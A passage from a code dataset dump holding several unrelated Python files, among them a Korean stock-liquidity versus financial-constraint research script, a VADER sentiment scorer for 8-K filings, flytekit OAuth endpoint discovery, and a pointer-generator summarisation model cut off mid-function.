Exception('Unknown segm_loss_fn: {}'.format(segm_loss_fn))\n model['segm_loss'] = segm_loss\n segm_loss_coeff = tf.constant(1.0)\n tf.add_to_collection('losses', segm_loss_coeff * segm_loss)\n\n####################\n# Total loss\n####################\n total_loss = tf.add_n(tf.get_collection('losses'), name='total_loss')\n model['loss'] = total_loss\n\n####################\n# Optimizer\n####################\n learn_rate = tf.train.exponential_decay(\n base_learn_rate, global_step, steps_per_learn_rate_decay,\n learn_rate_decay, staircase=True)\n model['learn_rate'] = learn_rate\n eps = 1e-7\n\n train_step = GradientClipOptimizer(\n tf.train.AdamOptimizer(learn_rate, epsilon=eps),\n clip=clip_gradient).minimize(total_loss, global_step=global_step)\n model['train_step'] = train_step\n\n return model\n","sub_path":"src/ris_fg_model.py","file_name":"ris_fg_model.py","file_ext":"py","file_size_in_byte":8555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"637115464","text":"#!/usr/bin/env python3\n\"\"\"\nFile Name : Problem076.py\nDate started : 2012-10-06\nDate solved : 2013-01-06\nRun Time : 864.13864 seconds\n\nIt is possible to write five as a sum in exactly six different ways:\n 4 + 1\n 3 + 2\n 3 + 1 + 1\n 2 + 2 + 1\n 2 + 1 + 1 + 1\n 1 + 1 + 1 + 1 + 1\n\nHow many different ways can one hundred (100) be written as a sum of at least\ntwo positive integers?\n\n\"\"\"\n\nimport project_euler\nimport project_euler.number_theory\n\nPROBLEM_NUMBER = 76\nSOLVED = 1\n\n\ndef problem076(input_=None):\n return project_euler.number_theory.partition(100) - 1\n\n\ndef run():\n print(project_euler.print_timing(problem076))\n\n\nif __name__ == \"__main__\":\n run()\n\n","sub_path":"problems/Problem076.py","file_name":"Problem076.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"408747408","text":"# ==============================================================================\r\n# Liquidity vs Financial Constraint\r\n# ==============================================================================\r\n\r\n#%%\r\nfrom itertools import product\r\nfrom sqlplus import *\r\nimport statistics as st\r\nimport numpy as np\r\nimport math\r\nfrom scipy.stats import ttest_1samp\r\nfrom contextlib import redirect_stdout\r\n\r\n\r\ndef addmonth(date, n):\r\n return dmath(date, f'{n} months', '%Y-%m')\r\n\r\n\r\ndef stars(pval):\r\n if pval <= 0.01:\r\n return \"***\"\r\n elif pval <= 0.05:\r\n return \"**\"\r\n elif pval <= 0.10:\r\n return \"*\"\r\n return \"\"\r\n\r\n\r\ndef diff(high, low):\r\n return [a - b for a, b in zip(high, low)]\r\n\r\n\r\ndef ttest(seq, n=3):\r\n tval, pval = ttest_1samp(seq, 0.0)\r\n return f'{round(st.mean(seq), n)}{stars(pval)}', round(tval, n)\r\n\r\n\r\nsetdir('data')\r\nprint('ready...')\r\n\r\n\r\n# ==============================================================================\r\n# File Loading\r\n# ==============================================================================\r\n\r\n#%%\r\nwith connect('db.db') as c:\r\n # 파일을 로딩할때 살짝 바꿔서 로딩할수 있음\r\n def yyyymm(r):\r\n \"1981-01-21 => 1981-01 column 하나 추가\"\r\n r.yyyymm = dconv(r.date, '%Y-%m-%d', '%Y-%m')\r\n return r\r\n\r\n def build_yyyymm(r):\r\n \"year 하고 month 붙이기 예를들면 1999, 3 => 1999-03\"\r\n r.yyyymm = str(r.year) + '-' + str(r.month).zfill(2)\r\n return r\r\n\r\n c.load('daily.csv', fn=yyyymm)\r\n c.load('comp_kor.csv', fn=build_yyyymm)\r\n c.load('prc.csv', fn=yyyymm)\r\n c.load('shrout.csv', fn=yyyymm)\r\n c.load('inflation.csv')\r\n c.load('ret.csv', fn=yyyymm)\r\n c.load('mkt500.csv', fn=yyyymm)\r\n c.load('exchcd.csv', fn=yyyymm)\r\n\r\n\r\n# ==============================================================================\r\n# Liquidity measures: Amihud, Zerofreq, Stoll(1989)\r\n# ==============================================================================\r\n# 이 작업은 좀 오래걸리니까 컴퓨터가 4개 이상의 코어를 갖고 있다면\r\n# multi process 를 활용하는 것을 고려해 볼만함 (single core 로 3시간 걸린거 같은데)\r\n#%%\r\ndef stoll_cov(prices):\r\n dprices = []\r\n for p0, p1 in zip(prices, prices[1:]):\r\n if isnum(p0, p1):\r\n dprices.append(p1 - p0)\r\n # np.cov 는 covariance matrix 를 계산\r\n return np.cov([dprices[1:], dprices[:-1]])[0, 1] if len(dprices) > 2 else ''\r\n\r\n\r\nwith connect('db.db') as c:\r\n nmonths = [1, 3, 6, 12]\r\n # nmonths = [12]\r\n # ins 를 쓰면 코드는 이쁜데 너무 느려서 insert 를 써야함\r\n def gen():\r\n for rs in c.fetch(\"daily\", group=\"id\"):\r\n print(rs[0].id)\r\n for nmonth in nmonths:\r\n for rs1 in rs.overlap(nmonth, 1, 'yyyymm'):\r\n if addmonth(rs1[0].yyyymm, nmonth - 1) == rs1[-1].yyyymm:\r\n r = Row()\r\n r.yyyymm = rs1[-1].yyyymm\r\n r.id = rs1[-1].id\r\n xs = []\r\n for r0 in rs1.isnum('ret, tvol'):\r\n if r0.tvol > 0:\r\n xs.append(abs(r0.ret) * 10_000_000 / r0.tvol)\r\n r.amihud = st.mean(xs) if xs else ''\r\n r.zerofreq = len(rs1.where(lambda r: isnum(r.ret) and r.ret == 0))\r\n r.stoll_cov = stoll_cov(rs1['prc'])\r\n r.nmonth = nmonth\r\n # missing 이 아닌 것들의 개수\r\n r.n = len(rs1.isnum('ret'))\r\n yield r\r\n c.insert(gen(), 'liqproxies')\r\n\r\n\r\n# ==============================================================================\r\n# Financial Contraint measures\r\n# ==============================================================================\r\n\r\n#%%\r\n# 모든 fiscal month 가 12 월이라고 간주하고 진행하면, (12월이 아닌 경우는 9% 정도)\r\n# (나중에 바꿔볼지도 모르지만, kz index 계산과정에서 12 월 size 랑 매칭하는 걸 고려할때, 생각해 볼만함)\r\n\r\n\r\n# 12 월의 size 가 필요하니까\r\n# TODO: 이상하게 prc 파일이 shrout 보다 훨씬 크다. 둘다 코스닥 포함이던데...체크\r\nwith connect('db.db') as c:\r\n c.join(\r\n ['prc', '*', 'yyyymm, id'],\r\n ['shrout', 'shrout', 'yyyymm, id'],\r\n name='temp'\r\n )\r\n\r\n c.drop('size')\r\n for r in c.fetch('temp', where='isnum(prc, shrout)'):\r\n if r.yyyymm[5:] == '12':\r\n # 금액인 경우 단위가 다 천원이더라구\r\n r.size = (r.prc * r.shrout) / 1000\r\n r.year = r.yyyymm[0:4]\r\n c.ins(r, 'size')\r\n\r\n#%%\r\n\r\n# 전기 total asset 이랑 size 가 필요하니까\r\nwith connect('db.db') as c:\r\n c.create(\"select ta, ppe, id, year + 1 as year1 from comp_kor\", \"temp\")\r\n\r\n c.join(\r\n [\"comp_kor\", \"*\", \"id, year\"],\r\n # 혹시 몰라서 ppe 도\r\n [\"temp\", \"ta as ta1, ppe as ppe1\", \"id, year1\"],\r\n ['size', 'size', \"id, year\"],\r\n name='comp'\r\n )\r\n # inflation 을 붙이고\r\n c.join(\r\n ['comp', '*', 'year'],\r\n ['inflation', 'inflation', 'year']\r\n )\r\n\r\n\r\n#%%\r\n\r\nwith connect('db.db') as c:\r\n c.drop('constraints')\r\n for r in c.fetch('comp', where=\"\"\"\r\n isnum(oi, noi, dep, noc, div, ta1, ta, te, prefstock, size, tl, cash, csec, estdate)\r\n and ta1 > 0 and te > 0\r\n \"\"\"):\r\n # cash flow\r\n cf = (r.oi + r.noi + r.dep - r.noc - r.div) / r.ta1\r\n # cash holdings\r\n ch = (r.cash + r.csec) / r.ta1\r\n tobinq = (r.ta - (r.te - r.prefstock) + r.size) / r.te\r\n r.kzindex = -1.002 * cf + 0.283 * tobinq + 3.139 * (r.tl / r.ta1) \\\r\n - 39.368 * (r.div / r.ta1) - 1.315 * ch\r\n r.age = r.year - int(str(r.estdate)[0:4])\r\n # TODO: Whited and Wu index 는 왜 안섰는지\r\n # TODO: sa index 계산을 원화로 하면 뭔가 많이 이상해지는데\r\n # ta 는 단위 1000원 이므로 dollar 랑 비슷하긴 한데\r\n # inflation 은 2015 년을 100 으로 한 통계청 소비자 물가 지수\r\n # 논문에서는 age 랑 size winsorizing 도 있음!!\r\n logta = math.log(r.ta / (r.inflation / 100))\r\n\r\n r.saindex = -0.737 * logta + 0.043 * logta ** 2 - 0.040 * r.age\r\n r.ch = ch\r\n r.cf = cf\r\n r.tobinq = tobinq\r\n r.logta = logta\r\n c.ins(r, 'constraints')\r\n\r\n\r\n#%%\r\n# Almeida (alpha1)\r\nwith connect('db.db') as c:\r\n c.create('select id, year + 1 as year, ch as ch1 from constraints', 'temp')\r\n c.join(\r\n ['constraints', '*', 'id, year'],\r\n ['temp', 'ch1', 'id, year'],\r\n name='temp',\r\n pkeys='id, year'\r\n )\r\n\r\n c.drop('almeida')\r\n # TODO: 6 년은 임의의 값\r\n for rs in c.fetch('temp', order='year', group='id', where=\"\"\"\r\n isnum(ch, ch1, cf, tobinq, logta)\r\n \"\"\"):\r\n for rs1 in rs.overlap(6):\r\n if rs1[0].year + 5 == rs1[-1].year:\r\n for r in rs1:\r\n r.dch = r.ch - r.ch1\r\n result = rs1.ols('dch ~ cf + tobinq + logta')\r\n r0 = Row()\r\n r0.year = rs1[-1].year\r\n r0.id = rs1[-1].id\r\n r0.almeida = result.params.cf\r\n c.ins(r0, 'almeida')\r\n\r\n c.join(\r\n ['constraints', '*', 'id, year'],\r\n ['almeida', 'almeida', 'id, year'],\r\n name='constraints1'\r\n )\r\n\r\n\r\n\r\n\r\n# ==============================================================================\r\n# DATASET\r\n# ==============================================================================\r\n#%%\r\n# liquidity measure 랑 constraint 랑 합해보자\r\n# 근데 lagged(1 month) size 가 필요해 나중에 weighted return 구해야 하거든\r\nwith connect('db.db') as c:\r\n # 아 그냥 'db' 라고 할걸 괜히 'db.db' 라고 해서 귀찮네\r\n c.join(\r\n ['prc', '*', 'id, yyyymm'],\r\n ['shrout', 'shrout', 'id, yyyymm'],\r\n name='temp'\r\n )\r\n c.register(addmonth)\r\n c.create('select *, (prc * shrout) / 1000 as size1, addmonth(yyyymm, 1) as yyyymm1 from temp', 'size1')\r\n\r\n\r\n#%%\r\n\r\nwith connect('db.db') as c:\r\n def gen(tbl):\r\n for r in c.fetch(tbl):\r\n if r.nmonth == 12 and r.yyyymm[5:] == '12':\r\n r.year = r.yyyymm[:4]\r\n r.month = r.yyyymm[5:]\r\n yield r\r\n c.insert(gen('liqproxies'), 'temp1')\r\n\r\n def gen1(tbl):\r\n for r in c.fetch(tbl):\r\n if r.yyyymm[5:] == '12':\r\n r.year = r.yyyymm[:4]\r\n r.month = r.yyyymm[5:]\r\n yield r\r\n c.insert(gen1('mkt500'), 'temp2')\r\n c.insert(gen1('exchcd'), 'temp3')\r\n c.join(\r\n ['temp1', '*', 'id, year'],\r\n ['temp2', 'mkt500', 'id, year'],\r\n ['temp3', 'exchcd', 'id, year']\r\n )\r\n\r\n c.join(\r\n ['temp1', '*', 'id, year'],\r\n ['constraints1', 'kzindex, logta, age, payout, saindex, almeida', 'id, year']\r\n )\r\n\r\n # TODO: 맞는지 확인, \"2012-04\" - \"2013-03\" 까지를 2011 년의 constraint 랑 맞춰줘야 하니까,\r\n def matching_year(yyyymm):\r\n year = int(yyyymm[0:4])\r\n if yyyymm[5:] in ['01', '02', '03']:\r\n return year - 2\r\n return year - 1\r\n\r\n # 위의 함수를 등록해주면, sql 에서 쓸수 있게 됨\r\n c.register(matching_year)\r\n c.join(\r\n ['ret', '*', 'id, yyyymm'],\r\n ['size1', 'prc, shrout, size1', 'id, yyyymm1'],\r\n name='temp2'\r\n )\r\n c.create('select *, matching_year(yyyymm) as myear from temp2')\r\n\r\n c.join(\r\n ['temp2', '*', 'id, myear'],\r\n ['temp1', \"\"\"amihud, zerofreq, stoll_cov, nmonth, exchcd, mkt500,\r\n kzindex, logta, age, payout, saindex, almeida\"\"\", 'id, year'],\r\n name='dataset'\r\n )\r\n c.create(\"\"\"select * from dataset where isnum(ret, prc) and prc >= 1000\r\n and (exchcd=\"유가증권시장\" or exchcd=\"코스닥\")\r\n \"\"\")\r\n\r\n\r\n\r\n\r\n# ==============================================================================\r\n# 2 WAY sorting\r\n# ==============================================================================\r\n#%%\r\n# liquidity 계산 기간을 1, 3, 6, 12 로 했는데 생각해 보니까 FC 랑 맞추려면 일단 12 개월이\r\n# 첫번째 후보가 되어야 할것 같음\r\nwith connect('db.db') as c:\r\n fcs = ['kzindex', 'logta', 'age', 'payout', 'saindex', 'almeida']\r\n liqs = ['amihud', 'zerofreq', 'stoll_cov']\r\n\r\n def gen():\r\n for fc, liq in product(fcs, liqs):\r\n print(fc, liq)\r\n for rs in c.fetch('dataset', order='yyyymm', group='myear', where=f\"\"\"\r\n isnum({fc}, {liq}, ret) and (exchcd=\"유가증권시장\")\r\n \"\"\"):\r\n # fc, liq column 추가\r\n rs.set('fc', fc)\r\n rs.set('liq', liq)\r\n\r\n # 1 년치씩 뽑아낸 후에, 첫번째 달의 값을 기준으로 포트폴리오를 짜고\r\n rs0 = rs.group('yyyymm')[0]\r\n\r\n # dependent sort\r\n rs.set('pn_fc', '')\r\n rs.set('pn_liq', '')\r\n # fc 로 먼저 sort\r\n for i, c1 in enumerate(rs0.order(fc).chunk(5), 1):\r\n c1.set('pn_fc', i)\r\n for j, c2 in enumerate(c1.order(liq).chunk(5), 1):\r\n c2.set('pn_liq', j)\r\n # 이제 firm 별로 그루핑을 하고 첫번째 달의 값을 나머지 달에도 할당해 주면\r\n for rs1 in rs.group('id'):\r\n rs1.set('pn_fc', rs1[0].pn_fc)\r\n rs1.set('pn_liq', rs1[0].pn_liq)\r\n yield from rs\r\n c.insert(gen(), 'twoway')\r\n\r\n\r\n#%%\r\n# 각 포트폴리오별 ew, vw 평균을 구해봅시다\r\n# (도대체 이게 왜 오래걸리는지 모르겠다만, 꽤 오래걸림)\r\n\r\nwith connect('db.db') as c:\r\n def gen():\r\n for rs in c.fetch('twoway', group=\"fc, liq, yyyymm, pn_fc, pn_liq\",\r\n where=\"isnum(pn_fc, pn_liq, size1)\"):\r\n r = rs[0]\r\n r.ewret = rs.avg('ret')\r\n r.vwret = rs.avg('ret', 'size1')\r\n r.n = len(rs)\r\n yield r\r\n\r\n for rs in c.fetch('twoway', group=\"fc, liq, yyyymm, pn_fc \",\r\n where=\"isnum(pn_fc, pn_liq, size1)\"):\r\n r = rs[0]\r\n r.pn_liq = 0\r\n r.ewret = rs.avg('ret')\r\n r.vwret = rs.avg('ret', 'size1')\r\n r.n = len(rs)\r\n yield r\r\n\r\n for rs in c.fetch('twoway', group=\"fc, liq, yyyymm, pn_liq \",\r\n where=\"isnum(pn_fc, pn_liq, size1)\"):\r\n r = rs[0]\r\n r.pn_fc = 0\r\n r.ewret = rs.avg('ret')\r\n r.vwret = rs.avg('ret', 'size1')\r\n r.n = len(rs)\r\n yield r\r\n\r\n for rs in c.fetch('twoway', group=\"fc, liq, yyyymm\",\r\n where=\"isnum(pn_fc, pn_liq, size1)\"):\r\n r = rs[0]\r\n r.pn_fc = 0\r\n r.pn_liq = 0\r\n r.ewret = rs.avg('ret')\r\n r.vwret = rs.avg('ret', 'size1')\r\n r.n = len(rs)\r\n yield r\r\n\r\n c.insert(gen(), 'result01')\r\n\r\n\r\n# ==============================================================================\r\n# Table01.csv\r\n# ==============================================================================\r\n#%%\r\ndef getfn(rs, i, j):\r\n if i == 0 and j == 0:\r\n return rs\r\n elif i == 0:\r\n return rs.where(lambda r: r.pn_liq == j)\r\n elif j == 0:\r\n return rs.where(lambda r: r.pn_fc == i)\r\n else:\r\n return rs.where(lambda r: r.pn_fc == i and r.pn_liq == j)\r\n\r\n\r\nwith connect('db.db') as c:\r\n def avgfn(rs, col):\r\n print()\r\n print(rs[0].fc, rs[0].liq, col)\r\n print(',0,1,2,3,4,5,diff')\r\n for i in range(6):\r\n print(i, end=',')\r\n for j in range(6):\r\n print(getfn(rs, i, j).avg(col, ndigits=2), end=',')\r\n high = getfn(rs, i, 5)[col]\r\n low = getfn(rs, i, 1)[col]\r\n m, tval = ttest(diff(high, low))\r\n print(f'{m}[{tval}]')\r\n print(end=',')\r\n for j in range(6):\r\n high = getfn(rs, 5, j)[col]\r\n low = getfn(rs, 1, j)[col]\r\n m, tval = ttest(diff(high, low))\r\n print(f'{m}[{tval}]', end=',')\r\n h1 = getfn(rs, 1, 5)[col]\r\n l1 = getfn(rs, 1, 1)[col]\r\n h2 = getfn(rs, 5, 5)[col]\r\n l2 = getfn(rs, 5, 1)[col]\r\n # diff of diff\r\n d = diff(diff(h2, l2), diff(h1, l1))\r\n m, tval = ttest(d)\r\n print(f'{m}[{tval}]')\r\n print()\r\n\r\n with open('table01.csv', 'w') as f, redirect_stdout(f):\r\n for rs in c.fetch('result01', group='fc, liq', where=\"\"\"\r\n yyyymm >= '2001-04' and yyyymm <= '2017-03'\r\n \"\"\"):\r\n avgfn(rs, 'ewret')\r\n avgfn(rs, 'vwret')\r\n\r\n\r\n\r\n\r\n#%%\r\n\r\n# ==============================================================================\r\n# ==============================================================================\r\n\r\nwith connect('db.db') as c:\r\n # print(c.df('dataset', cols='ret, size1, amihud, stoll_cov, zerofreq, kzindex, logta, age, payout, saindex, almeida').describe())\r\n print(c.df('dataset', where='isnum(ret)', cols='ret').describe([0.01, 0.05, 0.1, 0.25, 0.5, 0.75, 0.9, 0.95, 0.99]))\r\n # print(c.df('dataset', where='isnum(ret) and ret > 1000', cols='ret').describe([0.01, 0.05, 0.1, 0.25, 0.5, 0.75, 0.9, 0.95, 0.99]))\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":15667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"573871361","text":"import pandas as pd\nimport numpy as np\nimport os\nimport re\n\nfrom nltk.sentiment.vader import SentimentIntensityAnalyzer\nfrom nltk import tokenize\n\n\ndef cal_tone():\n\n # re expressions to parse the text\n prog_line = re.compile('\\n')\n prog_nbsp = re.compile(' ')\n prog_tag = re.compile('<.*?>')\n\n res = []\n sid = SentimentIntensityAnalyzer()\n for root, _, files in os.walk('data/'):\n for file in files:\n CIK, date = file.split('|')[0], file.split('|')[1][:10]\n entry = {'CIK': int(CIK), 'date': date}\n with open(root + '/' + file, 'r') as f:\n text = f.read()\n\n # informational part of 8-K\n text = text[text.find(''): text.find('')]\n text = prog_line.sub(' ', text)\n text = prog_nbsp.sub(' ', text)\n text = prog_tag.sub(' ', text)\n\n # tokenize and calculate compound score\n sentences = tokenize.sent_tokenize(text)\n scores = [sid.polarity_scores(stn)['compound'] for stn in sentences[2:-4]]\n try:\n entry['tone'] = sum(scores) / len(scores)\n except:\n entry['tone'] = np.nan\n res.append(entry)\n\n res_df = pd.DataFrame(res)\n res_df.to_csv('out/adv_sentiment.csv')\n\n\nif __name__ == \"__main__\":\n cal_tone()","sub_path":"Python/Chava Final/adv_sentiment.py","file_name":"adv_sentiment.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"37292868","text":"from __future__ import absolute_import\n\nimport logging as _logging\n\nfrom flytekit.clis.auth.auth import AuthorizationClient as _AuthorizationClient\nfrom flytekit.clis.auth.discovery import DiscoveryClient as _DiscoveryClient\n\nfrom flytekit.configuration.creds import (\n REDIRECT_URI as _REDIRECT_URI,\n CLIENT_ID as _CLIENT_ID,\n)\nfrom flytekit.configuration.platform import URL as _URL, INSECURE as _INSECURE, HTTP_URL as _HTTP_URL\n\ntry: # Python 3\n import urllib.parse as _urlparse\nexcept ImportError: # Python 2\n import urlparse as _urlparse\n\n# Default, well known-URI string used for fetching JSON metadata. See https://tools.ietf.org/html/rfc8414#section-3.\ndiscovery_endpoint_path = \"./.well-known/oauth-authorization-server\"\n\n\ndef _get_discovery_endpoint(http_config_val, platform_url_val, insecure_val):\n\n if http_config_val:\n scheme, netloc, path, _, _, _ = _urlparse.urlparse(http_config_val)\n if not scheme:\n scheme = 'http' if insecure_val else 'https'\n else: # Use the main _URL config object effectively\n scheme = 'http' if insecure_val else 'https'\n netloc = platform_url_val\n path = ''\n\n computed_endpoint = _urlparse.urlunparse((scheme, netloc, path, None, None, None))\n # The urljoin function needs a trailing slash in order to append things correctly. Also, having an extra slash\n # at the end is okay, it just gets stripped out.\n computed_endpoint = _urlparse.urljoin(computed_endpoint + '/', discovery_endpoint_path)\n _logging.info('Using {} as discovery endpoint'.format(computed_endpoint))\n return computed_endpoint\n\n\n# Lazy initialized authorization client singleton\n_authorization_client = None\n\n\ndef get_client():\n global _authorization_client\n if _authorization_client is not None and not _authorization_client.expired:\n return _authorization_client\n authorization_endpoints = get_authorization_endpoints()\n\n _authorization_client =\\\n _AuthorizationClient(redirect_uri=_REDIRECT_URI.get(), client_id=_CLIENT_ID.get(),\n auth_endpoint=authorization_endpoints.auth_endpoint,\n token_endpoint=authorization_endpoints.token_endpoint)\n return _authorization_client\n\n\ndef get_authorization_endpoints():\n discovery_endpoint = _get_discovery_endpoint(_HTTP_URL.get(), _URL.get(), _INSECURE.get())\n discovery_client = _DiscoveryClient(discovery_url=discovery_endpoint)\n return discovery_client.get_authorization_endpoints()\n","sub_path":"flytekit/clis/auth/credentials.py","file_name":"credentials.py","file_ext":"py","file_size_in_byte":2517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"185806496","text":"import mongoengine\nfrom mongoengine import signals\n\nfrom daimaduan.models import BaseDocument\n\n\nclass Like(BaseDocument):\n user = mongoengine.ReferenceField('User')\n likeable = mongoengine.GenericReferenceField('Paste')\n\n @classmethod\n def post_save(cls, sender, document, **kwargs):\n if kwargs.get('created'):\n field = document.likeable._cls.lower()\n document.user.increase_counter('%s_likes' % field)\n document.likeable.increase_counter('likes')\n\n @classmethod\n def post_delete(cls, sender, document, **kwargs):\n field = document.likeable._cls.lower()\n document.user.increase_counter('%s_likes' % field, -1)\n document.likeable.increase_counter('likes', -1)\n\nsignals.post_save.connect(Like.post_save, sender=Like)\nsignals.post_delete.connect(Like.post_delete, sender=Like)\n","sub_path":"daimaduan/models/like.py","file_name":"like.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"333592485","text":"import sys\nreload(sys)\nsys.setdefaultencoding(\"utf-8\")\n\nimport json\nimport datetime\n\n\ndef printTranscript(messages):\n \"\"\"Prints a readable \"transcript\" from the given list of messages.\n\n Assumes the input list is sorted.\"\"\"\n\n for message in messages:\n name = message[u'name']\n\n time = datetime.datetime.fromtimestamp(message[u'created_at']).strftime('%Y-%m-%d %H:%M')\n\n # text is None for a photo message\n if message[u'text'] is not None:\n text = message[u'text']\n else:\n text = \"(no text)\"\n\n if message[u'system'] is True:\n system_padded = '(SYS) '\n else:\n system_padded = ''\n\n if len(message[u'favorited_by']) is not 0:\n favorites_padded = ' (' + str(len(message[u'favorited_by'])) + 'x <3)'\n else:\n favorites_padded = ''\n\n if message[u'picture_url'] is not None:\n pic = ' ; photo URL ' + message[u'picture_url']\n else:\n pic = ''\n\n print(system_padded + name + ' (' + time + ')' + favorites_padded + ': ' + text + pic)\n\n\ndef main():\n \"\"\"Usage: simple-transcript.py filename.json\n\nAssumes filename.json is a JSON GroupMe transcript in chronological order.\n\nTimes displayed in local timezone.\n \"\"\"\n\n if len(sys.argv) < 2:\n print(main.__doc__)\n sys.exit(1)\n\n transcriptFile = open(sys.argv[1])\n transcript = json.load(transcriptFile)\n transcriptFile.close()\n\n printTranscript(transcript)\n\n\nif __name__ == '__main__':\n main()\n sys.exit(0)\n","sub_path":"simple-transcript.py","file_name":"simple-transcript.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"144914243","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# @Time : 2020/5/28 11:46\r\n# @Author : TheTao\r\n# @Site : \r\n# @File : PGN_model.py\r\n# @Software: PyCharm\r\nimport tensorflow as tf\r\nfrom PGN_remodel.model_layers import Encoder, Decoder, BahdanauAttention, Pointer\r\nfrom PGN_remodel.data_utils.wv_loader import load_embedding_matrix\r\n\r\n\r\nclass PGN(tf.keras.Model):\r\n # 搭建网络架构\r\n def __init__(self, params):\r\n super(PGN, self).__init__()\r\n self.embedding_matrix = load_embedding_matrix()\r\n self.params = params\r\n self.encoder = Encoder(params[\"vocab_size\"],\r\n params[\"embed_size\"],\r\n self.embedding_matrix,\r\n params[\"enc_units\"],\r\n params[\"batch_size\"])\r\n self.attention = BahdanauAttention(units=params[\"attn_units\"])\r\n self.decoder = Decoder(params[\"vocab_size\"],\r\n params[\"embed_size\"],\r\n self.embedding_matrix,\r\n params[\"dec_units\"],\r\n params[\"batch_size\"],\r\n self.attention)\r\n self.pointer = Pointer()\r\n\r\n def call_encoder(self, enc_inp):\r\n enc_output, enc_hidden = self.encoder(enc_inp)\r\n return enc_output, enc_hidden\r\n\r\n def call_decoder_one_step(self, enc_extended_inp, batch_oov_len, dec_input, dec_hidden, enc_output,\r\n enc_pad_mask, prev_coverage, use_coverage=True):\r\n # 开始decoder\r\n context_vector, dec_hidden, dec_x, pred, attn, coverage = self.decoder(dec_input, dec_hidden, enc_output,\r\n enc_pad_mask, prev_coverage,\r\n use_coverage)\r\n if self.params[\"pointer_gen\"]:\r\n # 计算p_gen\r\n p_gen = self.pointer(context_vector, dec_hidden, dec_x)\r\n # 保证pred attn p_gen的参数为3D的\r\n final_dist = _calc_final_dist(enc_extended_inp,\r\n tf.expand_dims(pred, 1),\r\n tf.expand_dims(attn, 1),\r\n tf.expand_dims(p_gen, 1),\r\n batch_oov_len,\r\n self.params[\"vocab_size\"],\r\n self.params['batch_size'])\r\n return tf.stack(final_dist, 1), dec_hidden, context_vector, attn, p_gen, coverage\r\n\r\n def call(self, enc_inp, dec_inp, enc_extended_inp, batch_oov_len, enc_pad_mask, use_coverage=True):\r\n \"\"\"\r\n :param enc_inp:\r\n :param dec_inp: tf.expand_dims(dec_inp[:, t], 1)\r\n :param enc_extended_inp:\r\n :param batch_oov_len:\r\n \"\"\"\r\n predictions = []\r\n attentions = []\r\n p_gens = []\r\n coverages = []\r\n # 计算encoder的输出\r\n enc_output, enc_hidden = self.encoder(enc_inp)\r\n dec_hidden = enc_hidden\r\n # 初始化coverage\r\n # (batch_size, enc_len, 1)\r\n prev_coverage = tf.zeros((enc_output.shape[0], enc_output.shape[1], 1))\r\n # teacher forcing\r\n for t in tf.range(dec_inp.shape[1]):\r\n context_vector, dec_hidden, dec_x, pred, attn, prev_coverage \\\r\n = self.decoder(dec_inp[:, t], # (batch_size, )\r\n dec_hidden, # (batch_size, dec_units)\r\n enc_output, # (batch_size, enc_len, enc_units)\r\n enc_pad_mask, # (batch_size, enc_len)\r\n prev_coverage,\r\n use_coverage)\r\n # 计算P_gen\r\n p_gen = self.pointer(context_vector, dec_hidden, dec_x)\r\n # 每轮迭代后把相应数据写入TensorArray\r\n predictions.append(pred)\r\n attentions.append(attn)\r\n p_gens.append(p_gen)\r\n coverages.append(prev_coverage)\r\n\r\n predictions = tf.stack(predictions, axis=1)\r\n attentions = tf.stack(attentions, axis=1)\r\n p_gens = tf.stack(p_gens, axis=1)\r\n coverages = tf.stack(coverages, axis=1)\r\n coverages = tf.squeeze(coverages, -1)\r\n # 计算final_dist\r\n # 注tf.transpose()的作用是调整坐标轴顺序\r\n # predictions.stack() 的 shape == (dec_len, batch_size, vocab_size)\r\n # 执行了tf.transpose 后 shape == (batch_size, dec_len, vocab_size)\r\n final_dist = _calc_final_dist(enc_extended_inp,\r\n predictions,\r\n attentions,\r\n p_gens,\r\n batch_oov_len,\r\n self.params[\"vocab_size\"],\r\n self.params[\"batch_size\"])\r\n\r\n return final_dist, attentions, coverages\r\n\r\n\r\n# 这里也是改动重点\r\ndef _calc_final_dist(_enc_batch_extend_vocab, vocab_dists, attn_dists, p_gens, batch_oov_len, vocab_size, batch_size):\r\n # 确定的修改代码\r\n # 确定的修改代码\r\n # 先计算公式的左半部分\r\n # _vocab_dists_pgn (batch_size, dec_len, vocab_size)\r\n _vocab_dists_pgn = vocab_dists * p_gens\r\n # 根据oov表的长度补齐原词表\r\n # _extra_zeros (batch_size, dec_len, batch_oov_len)\r\n\r\n _extra_zeros = tf.zeros((batch_size, p_gens.shape[1], batch_oov_len))\r\n # 拼接后公式的左半部分完成了\r\n # _vocab_dists_extended (batch_size, dec_len, vocab_size+batch_oov_len)\r\n _vocab_dists_extended = tf.concat([_vocab_dists_pgn, _extra_zeros], axis=-1)\r\n\r\n # 公式右半部分\r\n # 乘以权重后的注意力\r\n # _attn_dists_pgn (batch_size, dec_len, enc_len)\r\n _attn_dists_pgn = attn_dists * (1 - p_gens)\r\n # 拓展后的长度\r\n _extended_vocab_size = vocab_size + batch_oov_len\r\n\r\n # 要更新的数组 _attn_dists_pgn\r\n # 更新之后数组的形状与 公式左半部分一致\r\n # shape=[batch_size, dec_len, vocab_size+batch_oov_len]\r\n shape = _vocab_dists_extended.shape\r\n\r\n enc_len = tf.shape(_enc_batch_extend_vocab)[1]\r\n dec_len = tf.shape(_vocab_dists_extended)[1]\r\n\r\n # batch_nums (batch_size, )\r\n batch_nums = tf.range(0, limit=batch_size)\r\n # batch_nums (batch_size, 1)\r\n batch_nums = tf.expand_dims(batch_nums, 1)\r\n # batch_nums (batch_size, 1, 1)\r\n batch_nums = tf.expand_dims(batch_nums, 2)\r\n\r\n # tile 在第1,2个维度上分别复制batch_nums dec_len,enc_len次\r\n # batch_nums (batch_size, dec_len, enc_len)\r\n batch_nums = 